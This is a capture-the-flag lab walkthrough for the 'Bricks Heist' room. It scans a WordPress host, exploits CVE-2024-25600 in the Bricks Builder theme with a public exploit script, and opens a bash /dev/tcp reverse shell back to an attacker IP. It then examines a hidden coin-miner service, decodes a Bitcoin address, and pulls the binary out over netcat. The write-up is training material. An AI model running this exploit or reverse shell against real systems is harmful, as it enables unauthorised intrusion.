TryHack3M: Bricks Heist
1. Initial Target Setup and Port Scanning
Set Up Host Resolution
First, we set the target hostname/IP in our /etc/hosts
file to easily reference the machine:
# /etc/hosts
TARGET_IP bricks.thm
Define the Target IP and Perform a Fast Full Port Scan
We export the target IP as an environment variable and use Nmap to quickly scan all TCP ports on the target:
export TARGET_IP=10.10.105.128
nmap -p- -Pn --min-rate 5000 $TARGET_IP
Nmap Results Summary:
Not shown: 65409 closed tcp ports (reset), 122 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3306/tcp open mysql
2. Service Version Detection and Enumeration
We further probe the most interesting ports (80, 443, and 3306) using version detection (-sV
) and default scripts (-sC
):
nmap -p80,443,3306 -Pn -sV -sC $TARGET_IP
Interpreting the Output:
PORT STATE SERVICE VERSION
80/tcp open http Python http.server 3.5 - 3.10
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp open ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
3306/tcp open mysql MySQL (unauthorized)
Key Points:
- Port 80: Runs a Python HTTP server.
- Port 443: Runs Apache with WordPress 6.5. The robots.txt disallows access to
/wp-admin/
. - Port 3306: MySQL is accessible without authorization (likely misconfigured).
3. Exploiting a Known Vulnerability
Identifying the Vulnerability
A look at the source code reveals the use of the WordPress Bricks Builder theme (dated 2024/04/02). Research shows the existence of CVE-2024-25600, which is a Remote Code Execution (RCE) vulnerability in the theme. This vulnerability allows an attacker to execute arbitrary code on the server without needing to authenticate.
Exploitation Steps
Clone the public exploit repository and run the script:
git clone https://github.com/Chocapikk/CVE-2024-25600
cd CVE-2024-25600
pip install -r requirements.txt
python3 exploit.py -u "https://bricks.thm"
If successful, you should see a shell running as the Apache user:
id
# uid=1001(apache) gid=1001(apache) groups=1001(apache)
Explanation: The exploit targets the RCE vulnerability in the Bricks Builder theme, giving code execution privileges.
4. Upgrading to a Reverse Shell
Since the initial shell is messy, we create a cleaner reverse shell connection.
On Your Local Machine (Listener):
nc -lvnp 6666
On the Target Machine (Connect Back):
bash -c 'sh -i >& /dev/tcp/10.2.17.44/6666 0>&1'
Sanitizing the Terminal
Sometimes the reverse shell terminal can be garbled. Use the following commands to clean it up:
script /dev/null -c bash
# (Then press CTRL+Z to background the current process)
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty size # Verify the terminal size
stty rows <ROWS> columns <COLUMNS>
Explanation:
These commands reinitialize your shell and terminal settings to ensure proper display and input handling.
5. Post-Exploitation: Investigating for Persistence and Malicious Activity
Check for Unusual Services
Look for running services that might be used for persistence or indicate additional compromise:
systemctl list-units --type=service --state=running
Example output:
ubuntu.service loaded active running TRYHACK3M
Inspect the Suspect Service
View the details of the service:
systemctl cat ubuntu.service
Output:
ExecStart=/lib/NetworkManager/nm-inet-dialog
Change directory to inspect files related to this binary:
cd /lib/NetworkManager/
ls -al
You might see:
-rw-r--r-- 1 root root 48190 Apr 11 2024 inet.conf # Log file
-rwxr-xr-x 1 root root 6948448 Apr 8 2024 nm-inet-dialog # Binary
Examine the Log File
Check the beginning of inet.conf
:
head inet.conf
Example output:
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
...
Observation:
The log indicates that a Bitcoin mining operation was started.
6. Analyzing the Suspect Binary
Check the Binary File Type:
file nm-inet-dialog
Output:
nm-inet-dialog: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped
Explanation:
This shows that nm-inet-dialog
is a stripped Linux binary, making reverse engineering more challenging.
Decoding an Embedded String
The log file begins with a long hexadecimal string. A helper script (triple_decoder.py
) decodes it by:
- Converting from hex to bytes.
- Applying two rounds of Base64 decoding.
triple_decoder.py:
import base64
def hex_then_double_base64_decode(hex_string):
"""
Decodes a hex string, then performs two rounds of Base64 decoding.
"""
try:
# Step 1: Convert hex to bytes
byte_data = bytes.fromhex(hex_string)
# Step 2: First Base64 decode
decoded_data_1 = base64.b64decode(byte_data)
# Step 3: Second Base64 decode
final_decoded_data = base64.b64decode(decoded_data_1)
return final_decoded_data.decode('utf-8')
except ValueError as e:
return f"Error: Invalid input - {e}"
except Exception as e:
return f"An unexpected error occurred: {e}"
hex_input = input("Enter the hexadecimal string: ")
decoded_string = hex_then_double_base64_decode(hex_input)
print(decoded_string)
Run the Script:
python3 triple_decoder.py
Input the long hexadecimal string (from the log) when prompted:
5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
Output:
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
Observation:
The decoded string appears to be a Bech32 Bitcoin address (starts with “bc1q”) repeated twice. Although research did not reveal this as a real wallet, it is a hint linking this activity to the LockBit Ransomware Group.
7. Exfiltrating the Binary for Offline Analysis
Respecting the binary’s integrity, you might want to transfer it for further offline analysis (e.g., using VirusTotal or a dedicated reverse engineering environment).
Transfer via Netcat:
On the Receiver (Local Machine):
nc -lvnp 6666 > nm-inet-dialog
On the Sender (Target Machine):
nc 10.2.17.44 6666 < nm-inet-dialog
This simple Netcat transfer allows you to safely extract the suspect binary for detailed analysis. Subsequent testing (e.g., on VirusTotal) confirmed that the binary is indeed a coin miner.